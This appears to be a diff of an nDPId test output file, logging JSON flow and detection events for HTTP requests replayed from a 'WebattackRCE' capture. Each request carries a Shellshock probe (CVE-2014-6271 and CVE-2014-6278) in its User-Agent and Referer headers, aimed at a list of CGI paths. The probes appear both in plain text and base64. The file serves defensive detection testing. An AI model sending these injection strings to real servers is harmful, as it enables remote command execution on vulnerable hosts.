00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":450,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":450,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277399,"flow_last_seen":1576420277399,"flow_idle_time":7580000,"flow_min_l4_payload_len":214,"flow_max_l4_payload_len":214,"flow_tot_l4_payload_len":214,"flow_avg_l4_payload_len":214,"midstream":1,"thread_ts_msec":1576420277399,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50462,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00768{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":450,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":450,"flow_packet_id":1,"flow_last_seen":1576420277399,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":280,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":280,"pkt_l4_len":246,"thread_ts_msec":1576420277399,"pkt":"AAAAAAAAAAAAAAAACABFAAEK9YVAAEAGRmZ\/AAABfwAAAcUeH5Br181GQEYmBIAYAED+\/gAAAQEICp1m\/b+dZv2\/R0VUIC9jb3VudC5jZ2kgSFRUUC8xLjENClVzZXItQWdlbnQ6ICgpIHsgOjsgfTsgZWNobyA5M2U0cjAtQ1ZFLTIwMTQtNjI3MTogdHJ1ZTtlY2hvO2VjaG87DQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpIb3N0OiAxMjcuMC4wLjENClJlZmVyZXI6ICgpIHsgXzsgfSA+X1skKCQoKSldIHsgZWNobyA5M2U0cjAtQ1ZFLTIwMTQtNjI3ODogdHJ1ZTsgZWNobztlY2hvOyB9DQoNCg=="} -01157{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":450,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":450,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277399,"flow_last_seen":1576420277399,"flow_idle_time":7580000,"flow_min_l4_payload_len":214,"flow_max_l4_payload_len":214,"flow_tot_l4_payload_len":214,"flow_avg_l4_payload_len":214,"midstream":1,"thread_ts_msec":1576420277399,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50462,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"11": {"risk":"HTTP Suspicious User-Agent","severity":"High","risk_score": {"total":510,"client":455,"server":55}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/count.cgi","code":0,"content_type":"","user_agent":"() { :; }; echo 93e4r0-CVE-2014-6271: true;echo;echo;"}} +01157{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":450,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":450,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277399,"flow_last_seen":1576420277399,"flow_idle_time":7580000,"flow_min_l4_payload_len":214,"flow_max_l4_payload_len":214,"flow_tot_l4_payload_len":214,"flow_avg_l4_payload_len":214,"midstream":1,"thread_ts_msec":1576420277399,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50462,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"11": {"risk":"HTTP Suspicious User-Agent","severity":"High","risk_score": {"total":510,"client":455,"server":55}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/count.cgi","code":0,"content_type":"","user_agent":"() { :; }; echo 93e4r0-CVE-2014-6271: true;echo;echo;"}} 00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":451,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":451,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277401,"flow_last_seen":1576420277401,"flow_idle_time":7580000,"flow_min_l4_payload_len":223,"flow_max_l4_payload_len":223,"flow_tot_l4_payload_len":223,"flow_avg_l4_payload_len":223,"midstream":1,"thread_ts_msec":1576420277401,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50464,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00779{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":451,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":451,"flow_packet_id":1,"flow_last_seen":1576420277401,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":289,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":289,"pkt_l4_len":255,"thread_ts_msec":1576420277401,"pkt":"AAAAAAAAAAAAAAAACABFAAETxAhAAEAGd9p\/AAABfwAAAcUgH5CMzvzBXE4TboAYAED\/BwAAAQEICp1m\/cGdZv3BR0VUIC9kZWZhdWx0d2VicGFnZS5jZ2kgSFRUUC8xLjENCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNClVzZXItQWdlbnQ6ICgpIHsgOjsgfTsgZWNobyA5M2U0cjAtQ1ZFLTIwMTQtNjI3MTogdHJ1ZTtlY2hvO2VjaG87DQpSZWZlcmVyOiAoKSB7IF87IH0gPl9bJCgkKCkpXSB7IGVjaG8gOTNlNHIwLUNWRS0yMDE0LTYyNzg6IHRydWU7IGVjaG87ZWNobzsgfQ0KSG9zdDogMTI3LjAuMC4xDQoNCg=="} -01166{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":451,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":451,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277401,"flow_last_seen":1576420277401,"flow_idle_time":7580000,"flow_min_l4_payload_len":223,"flow_max_l4_payload_len":223,"flow_tot_l4_payload_len":223,"flow_avg_l4_payload_len":223,"midstream":1,"thread_ts_msec":1576420277401,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50464,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"11": {"risk":"HTTP Suspicious User-Agent","severity":"High","risk_score": {"total":510,"client":455,"server":55}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/defaultwebpage.cgi","code":0,"content_type":"","user_agent":"() { :; }; echo 93e4r0-CVE-2014-6271: true;echo;echo;"}} +01166{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":451,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":451,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277401,"flow_last_seen":1576420277401,"flow_idle_time":7580000,"flow_min_l4_payload_len":223,"flow_max_l4_payload_len":223,"flow_tot_l4_payload_len":223,"flow_avg_l4_payload_len":223,"midstream":1,"thread_ts_msec":1576420277401,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50464,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"11": {"risk":"HTTP Suspicious User-Agent","severity":"High","risk_score": {"total":510,"client":455,"server":55}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/defaultwebpage.cgi","code":0,"content_type":"","user_agent":"() { :; }; echo 93e4r0-CVE-2014-6271: true;echo;echo;"}} 00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":452,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":452,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277402,"flow_last_seen":1576420277402,"flow_idle_time":7580000,"flow_min_l4_payload_len":217,"flow_max_l4_payload_len":217,"flow_tot_l4_payload_len":217,"flow_avg_l4_payload_len":217,"midstream":1,"thread_ts_msec":1576420277402,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50466,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00772{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":452,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":452,"flow_packet_id":1,"flow_last_seen":1576420277402,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":283,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":283,"pkt_l4_len":249,"thread_ts_msec":1576420277402,"pkt":"AAAAAAAAAAAAAAAACABFAAENn\/9AAEAGm+l\/AAABfwAAAcUiH5Cfgqc8sQq4SIAYAED\/AQAAAQEICp1m\/cKdZv3CR0VUIC9kb3dubG9hZC5jZ2kgSFRUUC8xLjENClVzZXItQWdlbnQ6ICgpIHsgOjsgfTsgZWNobyA5M2U0cjAtQ1ZFLTIwMTQtNjI3MTogdHJ1ZTtlY2hvO2VjaG87DQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpSZWZlcmVyOiAoKSB7IF87IH0gPl9bJCgkKCkpXSB7IGVjaG8gOTNlNHIwLUNWRS0yMDE0LTYyNzg6IHRydWU7IGVjaG87ZWNobzsgfQ0KSG9zdDogMTI3LjAuMC4xDQoNCg=="} -01160{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":452,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":452,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277402,"flow_last_seen":1576420277402,"flow_idle_time":7580000,"flow_min_l4_payload_len":217,"flow_max_l4_payload_len":217,"flow_tot_l4_payload_len":217,"flow_avg_l4_payload_len":217,"midstream":1,"thread_ts_msec":1576420277402,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50466,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"11": {"risk":"HTTP Suspicious User-Agent","severity":"High","risk_score": {"total":510,"client":455,"server":55}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/download.cgi","code":0,"content_type":"","user_agent":"() { :; }; echo 93e4r0-CVE-2014-6271: true;echo;echo;"}} +01160{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":452,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":452,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277402,"flow_last_seen":1576420277402,"flow_idle_time":7580000,"flow_min_l4_payload_len":217,"flow_max_l4_payload_len":217,"flow_tot_l4_payload_len":217,"flow_avg_l4_payload_len":217,"midstream":1,"thread_ts_msec":1576420277402,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50466,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"11": {"risk":"HTTP Suspicious User-Agent","severity":"High","risk_score": {"total":510,"client":455,"server":55}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/download.cgi","code":0,"content_type":"","user_agent":"() { :; }; echo 93e4r0-CVE-2014-6271: true;echo;echo;"}} 00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":453,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":453,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277403,"flow_last_seen":1576420277403,"flow_idle_time":7580000,"flow_min_l4_payload_len":222,"flow_max_l4_payload_len":222,"flow_tot_l4_payload_len":222,"flow_avg_l4_payload_len":222,"midstream":1,"thread_ts_msec":1576420277403,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50468,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00775{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":453,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":453,"flow_packet_id":1,"flow_last_seen":1576420277403,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":288,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":288,"pkt_l4_len":254,"thread_ts_msec":1576420277403,"pkt":"AAAAAAAAAAAAAAAACABFAAESp5VAAEAGlE5\/AAABfwAAAcUkH5At0J9VXKwRhYAYAED\/BgAAAQEICp1m\/cOdZv3DR0VUIC9lbnRyb3B5c2VhcmNoLmNnaSBIVFRQLzEuMQ0KVXNlci1BZ2VudDogKCkgeyA6OyB9OyBlY2hvIDkzZTRyMC1DVkUtMjAxNC02MjcxOiB0cnVlO2VjaG87ZWNobzsNCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNCkhvc3Q6IDEyNy4wLjAuMQ0KUmVmZXJlcjogKCkgeyBfOyB9ID5fWyQoJCgpKV0geyBlY2hvIDkzZTRyMC1DVkUtMjAxNC02Mjc4OiB0cnVlOyBlY2hvO2VjaG87IH0NCg0K"} -01165{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":453,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":453,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277403,"flow_last_seen":1576420277403,"flow_idle_time":7580000,"flow_min_l4_payload_len":222,"flow_max_l4_payload_len":222,"flow_tot_l4_payload_len":222,"flow_avg_l4_payload_len":222,"midstream":1,"thread_ts_msec":1576420277403,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50468,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"11": {"risk":"HTTP Suspicious User-Agent","severity":"High","risk_score": {"total":510,"client":455,"server":55}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/entropysearch.cgi","code":0,"content_type":"","user_agent":"() { :; }; echo 93e4r0-CVE-2014-6271: true;echo;echo;"}} +01165{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":453,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":453,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277403,"flow_last_seen":1576420277403,"flow_idle_time":7580000,"flow_min_l4_payload_len":222,"flow_max_l4_payload_len":222,"flow_tot_l4_payload_len":222,"flow_avg_l4_payload_len":222,"midstream":1,"thread_ts_msec":1576420277403,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50468,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"11": {"risk":"HTTP Suspicious User-Agent","severity":"High","risk_score": {"total":510,"client":455,"server":55}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/entropysearch.cgi","code":0,"content_type":"","user_agent":"() { :; }; echo 93e4r0-CVE-2014-6271: true;echo;echo;"}} 00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":454,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":454,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277405,"flow_last_seen":1576420277405,"flow_idle_time":7580000,"flow_min_l4_payload_len":212,"flow_max_l4_payload_len":212,"flow_tot_l4_payload_len":212,"flow_avg_l4_payload_len":212,"midstream":1,"thread_ts_msec":1576420277405,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50470,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00763{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":454,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":454,"flow_packet_id":1,"flow_last_seen":1576420277405,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":278,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":278,"pkt_l4_len":244,"thread_ts_msec":1576420277405,"pkt":"AAAAAAAAAAAAAAAACABFAAEI2lVAAEAGYZh\/AAABfwAAAcUmH5ARUOKViVHVaYAYAED+\/AAAAQEICp1m\/cSdZv3ER0VUIC9lbnYuY2dpIEhUVFAvMS4xDQpIb3N0OiAxMjcuMC4wLjENClJlZmVyZXI6ICgpIHsgXzsgfSA+X1skKCQoKSldIHsgZWNobyA5M2U0cjAtQ1ZFLTIwMTQtNjI3ODogdHJ1ZTsgZWNobztlY2hvOyB9DQpVc2VyLUFnZW50OiAoKSB7IDo7IH07IGVjaG8gOTNlNHIwLUNWRS0yMDE0LTYyNzE6IHRydWU7ZWNobztlY2hvOw0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KDQo="} -01155{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":454,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":454,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277405,"flow_last_seen":1576420277405,"flow_idle_time":7580000,"flow_min_l4_payload_len":212,"flow_max_l4_payload_len":212,"flow_tot_l4_payload_len":212,"flow_avg_l4_payload_len":212,"midstream":1,"thread_ts_msec":1576420277405,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50470,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"11": {"risk":"HTTP Suspicious User-Agent","severity":"High","risk_score": {"total":510,"client":455,"server":55}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/env.cgi","code":0,"content_type":"","user_agent":"() { :; }; echo 93e4r0-CVE-2014-6271: true;echo;echo;"}} +01155{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":454,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":454,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277405,"flow_last_seen":1576420277405,"flow_idle_time":7580000,"flow_min_l4_payload_len":212,"flow_max_l4_payload_len":212,"flow_tot_l4_payload_len":212,"flow_avg_l4_payload_len":212,"midstream":1,"thread_ts_msec":1576420277405,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50470,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"11": {"risk":"HTTP Suspicious User-Agent","severity":"High","risk_score": {"total":510,"client":455,"server":55}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/env.cgi","code":0,"content_type":"","user_agent":"() { :; }; echo 93e4r0-CVE-2014-6271: true;echo;echo;"}} 00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":455,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":455,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277406,"flow_last_seen":1576420277406,"flow_idle_time":7580000,"flow_min_l4_payload_len":220,"flow_max_l4_payload_len":220,"flow_tot_l4_payload_len":220,"flow_avg_l4_payload_len":220,"midstream":1,"thread_ts_msec":1576420277406,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50472,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00775{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":455,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":455,"flow_packet_id":1,"flow_last_seen":1576420277406,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":286,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":286,"pkt_l4_len":252,"thread_ts_msec":1576420277406,"pkt":"AAAAAAAAAAAAAAAACABFAAEQ2p9AAEAGYUZ\/AAABfwAAAcUoH5D43eJbIwWC0IAYAED\/BAAAAQEICp1m\/cadZv3GR0VUIC9lbnZpcm9ubWVudC5jZ2kgSFRUUC8xLjENClVzZXItQWdlbnQ6ICgpIHsgOjsgfTsgZWNobyA5M2U0cjAtQ1ZFLTIwMTQtNjI3MTogdHJ1ZTtlY2hvO2VjaG87DQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpIb3N0OiAxMjcuMC4wLjENClJlZmVyZXI6ICgpIHsgXzsgfSA+X1skKCQoKSldIHsgZWNobyA5M2U0cjAtQ1ZFLTIwMTQtNjI3ODogdHJ1ZTsgZWNobztlY2hvOyB9DQoNCg=="} -01163{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":455,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":455,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277406,"flow_last_seen":1576420277406,"flow_idle_time":7580000,"flow_min_l4_payload_len":220,"flow_max_l4_payload_len":220,"flow_tot_l4_payload_len":220,"flow_avg_l4_payload_len":220,"midstream":1,"thread_ts_msec":1576420277406,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50472,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"11": {"risk":"HTTP Suspicious User-Agent","severity":"High","risk_score": {"total":510,"client":455,"server":55}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/environment.cgi","code":0,"content_type":"","user_agent":"() { :; }; echo 93e4r0-CVE-2014-6271: true;echo;echo;"}} +01163{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":455,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":455,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277406,"flow_last_seen":1576420277406,"flow_idle_time":7580000,"flow_min_l4_payload_len":220,"flow_max_l4_payload_len":220,"flow_tot_l4_payload_len":220,"flow_avg_l4_payload_len":220,"midstream":1,"thread_ts_msec":1576420277406,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50472,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"11": {"risk":"HTTP Suspicious User-Agent","severity":"High","risk_score": {"total":510,"client":455,"server":55}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/environment.cgi","code":0,"content_type":"","user_agent":"() { :; }; echo 93e4r0-CVE-2014-6271: true;echo;echo;"}} 00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":456,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":456,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277407,"flow_last_seen":1576420277407,"flow_idle_time":7580000,"flow_min_l4_payload_len":217,"flow_max_l4_payload_len":217,"flow_tot_l4_payload_len":217,"flow_avg_l4_payload_len":217,"midstream":1,"thread_ts_msec":1576420277407,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50474,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00771{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":456,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":456,"flow_packet_id":1,"flow_last_seen":1576420277407,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":283,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":283,"pkt_l4_len":249,"thread_ts_msec":1576420277407,"pkt":"AAAAAAAAAAAAAAAACABFAAENbStAAEAGzr1\/AAABfwAAAcUqH5C5flXvg270eYAYAED\/AQAAAQEICp1m\/cedZv3HR0VUIC9lem1sbS1icm93c2UgSFRUUC8xLjENCkhvc3Q6IDEyNy4wLjAuMQ0KUmVmZXJlcjogKCkgeyBfOyB9ID5fWyQoJCgpKV0geyBlY2hvIDkzZTRyMC1DVkUtMjAxNC02Mjc4OiB0cnVlOyBlY2hvO2VjaG87IH0NCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNClVzZXItQWdlbnQ6ICgpIHsgOjsgfTsgZWNobyA5M2U0cjAtQ1ZFLTIwMTQtNjI3MTogdHJ1ZTtlY2hvO2VjaG87DQoNCg=="} -01160{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":456,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":456,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277407,"flow_last_seen":1576420277407,"flow_idle_time":7580000,"flow_min_l4_payload_len":217,"flow_max_l4_payload_len":217,"flow_tot_l4_payload_len":217,"flow_avg_l4_payload_len":217,"midstream":1,"thread_ts_msec":1576420277407,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50474,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"11": {"risk":"HTTP Suspicious User-Agent","severity":"High","risk_score": {"total":510,"client":455,"server":55}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/ezmlm-browse","code":0,"content_type":"","user_agent":"() { :; }; echo 93e4r0-CVE-2014-6271: true;echo;echo;"}} +01160{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":456,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":456,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277407,"flow_last_seen":1576420277407,"flow_idle_time":7580000,"flow_min_l4_payload_len":217,"flow_max_l4_payload_len":217,"flow_tot_l4_payload_len":217,"flow_avg_l4_payload_len":217,"midstream":1,"thread_ts_msec":1576420277407,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50474,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"11": {"risk":"HTTP Suspicious User-Agent","severity":"High","risk_score": {"total":510,"client":455,"server":55}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/ezmlm-browse","code":0,"content_type":"","user_agent":"() { :; }; echo 93e4r0-CVE-2014-6271: true;echo;echo;"}} 